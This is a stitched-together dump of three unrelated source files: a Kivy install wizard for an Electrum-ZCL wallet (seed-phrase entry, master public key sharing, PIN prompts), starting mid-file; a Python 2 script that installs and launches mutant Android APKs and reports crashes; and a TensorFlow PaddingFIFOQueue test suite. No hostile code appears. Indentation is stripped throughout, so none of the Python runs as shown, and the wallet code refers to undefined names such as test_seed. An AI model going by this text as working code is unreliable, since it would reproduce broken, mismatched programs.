<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: 0, 0, 0, .9
Rectangle:
size: Window.size
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From %d cosigners')%n.value
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require %d signatures')%m.value
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__(**kwargs)
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum_zcl.mnemonic import Mnemonic
from electrum_zcl.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
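        # 'p' now holds every letter that can follow the typed prefix; the loop
        # below keeps only those keys enabled (plus space once a complete word
        # has been entered).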
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and last_word
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
text = unicode(ti.text).strip()
text = ' '.join(text.split())
return text
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.is_valid = kwargs['is_valid']
self.title = kwargs['title']
self.message = kwargs['message']
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return unicode(ti.text).strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else unicode(self.app._clipboard.paste())
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard has finished creating or
restoring a wallet.
'''
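# Illustrative note (not from the original source): since the event is
# registered via __events__ below and the class is a Kivy Widget, a caller
# could also bind to it to receive the finished wallet, e.g.:
#   wizard = InstallWizard(...)  # hypothetical constructor arguments
#   wizard.bind(on_wizard_complete=lambda w, wallet: on_done(wallet))  # on_done is hypothetical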
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
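# Hypothetical usage (not from the original source):
#   self.waiting_dialog(lambda: some_slow_task(), _('Please wait...'))  # some_slow_task is illustrative
# The task runs on a worker thread; the info bubble shown below is hidden
# again on the Kivy main loop once the task completes.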
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
app.show_info_bubble(
text=msg, icon='atlas://gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, **kwargs):
self.dispatch('on_wizard_complete', self.wallet)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _("Please paste your cosigner's master public key, or scan it using the camera button.")
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_error(self, msg):
Clock.schedule_once(lambda dt: app.show_error(msg))
def password_dialog(self, message, callback):
popup = PasswordDialog()
popup.init(message, callback)
popup.open()
def request_password(self, run_next):
def callback(pin):
if pin:
self.run('confirm_password', pin, run_next)
else:
run_next(None)
self.password_dialog('Choose a PIN code', callback)
def confirm_password(self, pin, run_next):
def callback(conf):
if conf == pin:
run_next(pin, False)
else:
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
self.password_dialog('Confirm your PIN code', callback)
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
RunMutants.py
|
#coding:utf-8
import sys,os
import logging
from DeviceHelper import get_available_devices
from Device import Device
from App.app import App
from ConfigReader import ConfigReader
import threading,time
class RunMutants(object):
# This is a singleton class: only one instance is ever created (see __new__).
_instance_lock = threading.Lock()
# How long we wait before timing out on key dispatching ("Input event dispatching timed out").
KEY_DISPATCHING_TIMEOUT = 5 # seconds
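# Note: Android raises an "Input event dispatching timed out" ANR after roughly
# 5 seconds of blocked input dispatch, which is why the launch check below waits
# this long before probing whether the app is still running.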
def __init__(self,app_path=None,output_dir=None,singlemode=True,debug_mode=False):
logging.basicConfig(level=logging.DEBUG if debug_mode else logging.INFO)
self.logger = logging.getLogger(self.__class__.__name__)
all_devices = get_available_devices()
if len(all_devices) == 0:
self.logger.warning("ERROR: No device connected.")
sys.exit(-1)
self.vtDevice =[]
if singlemode:
self.vtDevice.append(Device(all_devices[0]))
else:
for device in all_devices:
self.vtDevice.append(Device(device))
#self.app = App(app_path, output_dir=output_dir)
self.lock = threading.Lock()
self.androidProject = None
self.mutantApkDir = None
self.projectApkDir = None
self.apkPaths = []
self.apps = []
self.mutation_home="."
def __new__(cls, *args, **kwargs):
if not hasattr(RunMutants, "_instance"):
with RunMutants._instance_lock:
if not hasattr(RunMutants, "_instance"):
RunMutants._instance = object.__new__(cls)
return RunMutants._instance
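# Illustrative note (not in the original source): the lock-guarded, double-checked
# __new__ above makes this class a process-wide singleton, so for example
#   RunMutants() is RunMutants()   # -> True; both expressions refer to one instance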
def start(self):
settings = ConfigReader().readXML(sys.argv)
self.androidProject = settings["project_name"]
self.mutantApkDir = settings["apk_output"]
self.mutation_home = settings["mutation_home"]
self.projectApkDir = self.mutantApkDir + os.sep + self.androidProject
self.getApkPaths(self.projectApkDir,self.apkPaths)
self.initApps()
#print "length: ",len(self.apkPaths)
threads = []
for device in self.vtDevice:
task = threading.Thread(target=self.check_crash_app,args=(device,))
task.start()
threads.append(task)
for t in threads:
t.join()
self.output_compilation_and_crash_report()
def check_crash_app(self,device):
device.set_up()
device.connect()
app = self.getOneApp()
if app is not None:
device.uninstall_app(app)
while app is not None:
device.install_app(app)
device.start_app(app)
time.sleep(RunMutants.KEY_DISPATCHING_TIMEOUT)
# print "Activity Name: "+device.get_top_activity_name(),self.app.get_package_name()
print "----------------------------------------------------"
print "APK: ",app.app_path
if device.app_is_running(app.get_package_name()):
print " Launch app successfully... "
else:
# Create a flag file when the apk crashes on launch
open(str(app.app_path).replace(".apk", "_app_crash_flag"),"w").close()
print "Launch app failed..."
print "----------------------------------------------------"
device.uninstall_app(app)
app = self.getOneApp()
self.stop()
def initApps(self):
self.apps = []
for appPath in self.apkPaths:
self.apps.append(appPath)
def getOneApp(self):
app = None
if self.apps is not None:
self.lock.acquire()
if len(self.apps) > 0:
app = self.apps.pop()
self.lock.release()
if app is None:
return None
return App(app)
def stop(self):
for device in self.vtDevice:
device.disconnect()
def getApkPaths(self,path,apkPaths):
fileNameList = os.listdir(path)
for fileName in fileNameList:
filePath = path+os.sep+fileName
if os.path.isdir(filePath):
self.getApkPaths(filePath,apkPaths)
continue
if str(fileName).endswith(".apk"):
apkPaths.append(filePath)
def getCrashFlag(self,path,crashFlagList):
fileNameList = os.listdir(path)
for fileName in fileNameList:
filePath = path+os.sep+fileName
if os.path.isdir(filePath):
self.getCrashFlag(filePath,crashFlagList)
continue
if str(fileName).endswith("_app_crash_flag"):
crashFlagList.append(filePath)
def output_compilation_and_crash_report(self):
crashFlagList = []
self.getCrashFlag(self.projectApkDir, crashFlagList)
outputFileDir = self.mutation_home + os.sep + "reports"
if not os.path.exists(outputFileDir):
os.makedirs(outputFileDir)
outputFile = open(outputFileDir+os.sep+self.androidProject+"_report.txt","a")
print "----------------------------------------------------"
outputFile.write("----------------------------------------------------"+os.linesep)
print "Output Report("+time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())+"):"
outputFile.write("Output Report("+time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())+"):" +os.linesep)
print "----------------------------------------------------"
outputFile.write("----------------------------------------------------"+os.linesep)
mutantsCount,failedCount = self.get_compilation_results()
print "Mutants Count: ",mutantsCount
outputFile.write("Mutants Count: "+str(mutantsCount)+os.linesep)
print "Compilation Success: ",mutantsCount-failedCount,"\tCompilation Failed: ",failedCount
outputFile.write("Compilation Success: "+str(mutantsCount-failedCount)+" Compilation Failed: "+str(failedCount)+os.linesep)
print "APK File: ", len(self.apkPaths)
outputFile.write("APK File: "+str(len(self.apkPaths))+os.linesep)
success = len(self.apkPaths) - len(crashFlagList)
failed = len(crashFlagList)
print "Launch Success : ", success, "\tLaunch Failed: ", failed
outputFile.write("Launch Success : "+str(success)+ " Launch Failed: "+str(failed)+os.linesep)
print "----------------------------------------------------"
outputFile.write("----------------------------------------------------")
outputFile.close()
def get_compilation_results(self):
javaFileCount = 0
compilationFailedCount = 0
vtClassName = os.listdir(self.projectApkDir)
for className in vtClassName:
classPath = self.projectApkDir + os.sep + className
vtMethodName = os.listdir(classPath)
for methodName in vtMethodName:
methodPath = classPath + os.sep + methodName
if os.path.isdir(methodPath):
vtMutantName = os.listdir(methodPath)
for mutantName in vtMutantName:
mutantPath = methodPath + os.sep + mutantName
vtFileName = os.listdir(mutantPath)
for fileName in vtFileName:
if fileName.endswith(".java"):
javaFileCount+=1
if len(vtFileName) == 1:
compilationFailedCount+=1
return javaFileCount,compilationFailedCount
if "__main__" == __name__:
RunMutants().start()
sys.exit(0)
|
padding_fifo_queue_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.PaddingFIFOQueue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
class PaddingFIFOQueueTest(tf.test.TestCase):
def testConstructor(self):
with tf.Graph().as_default():
q = tf.PaddingFIFOQueue(10, tf.float32, ((None,),), name="Q")
self.assertTrue(isinstance(q.queue_ref, tf.Tensor))
self.assertEquals(tf.string_ref, q.queue_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueue'
attr { key: 'component_types' value { list { type: DT_FLOAT } } }
attr { key: 'shapes' value { list { shape { dim { size: -1 } } } } }
attr { key: 'capacity' value { i: 10 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testMultiQueueConstructor(self):
with tf.Graph().as_default():
q = tf.PaddingFIFOQueue(5, (tf.int32, tf.float32),
((), ()),
shared_name="foo", name="Q")
self.assertTrue(isinstance(q.queue_ref, tf.Tensor))
self.assertEquals(tf.string_ref, q.queue_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueue'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list { shape { } shape { } } } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: 'foo' } }
""", q.queue_ref.op.node_def)
def testConstructorWithShapes(self):
with tf.Graph().as_default():
q = tf.PaddingFIFOQueue(5, (tf.int32, tf.float32),
shapes=(tf.TensorShape([1, 1, 2, 3]),
tf.TensorShape([5, 8])), name="Q")
self.assertTrue(isinstance(q.queue_ref, tf.Tensor))
self.assertEquals(tf.string_ref, q.queue_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueue'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list {
shape { dim { size: 1 }
dim { size: 1 }
dim { size: 2 }
dim { size: 3 } }
shape { dim { size: 5 }
dim { size: 8 } }
} } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testEnqueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
enqueue_op.run()
def testEnqueueWithShape(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, shapes=((3, 2),))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
self.assertEqual(1, q.size().eval())
def testEnqueueManyWithShape(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, [tf.int32, tf.int32],
shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertEqual(4, q.size().eval())
def testParallelEnqueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue, args=(e,))
for e in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
vals = dequeued_t.eval()
self.assertEqual([elems[i]], vals)
def testEnqueueAndBlockingDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(3, tf.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
sess.run(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
for elem, result in zip(elems, results):
self.assertEqual([elem], result)
def testMultiEnqueueAndDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.float32), ((), ()))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
x_val, y_val = sess.run(dequeued_t)
x, y = elems[i]
self.assertEqual([x], x_val)
self.assertEqual([y], y_val)
def testQueueSizeEmpty(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
self.assertEqual([0], q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual(1, size.eval())
dequeued_t.op.run()
self.assertEqual(0, size.eval())
def testEnqueueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
vals = dequeued_t.eval()
self.assertEqual([elems[i % 4]], vals)
def testEmptyEnqueueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((None, None),))
empty_t = tf.constant([], dtype=tf.float32,
shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual([0], size_t.eval())
enqueue_op.run()
self.assertEqual([0], size_t.eval())
def testEmptyDequeueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, shapes=((),))
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueManyWithDynamicShape(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, shapes=((None,),))
enqueue_op = q.enqueue(([10.0],))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueUpToWithDynamicShape(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, shapes=((None,),))
enqueue_op = q.enqueue(([10.0],))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
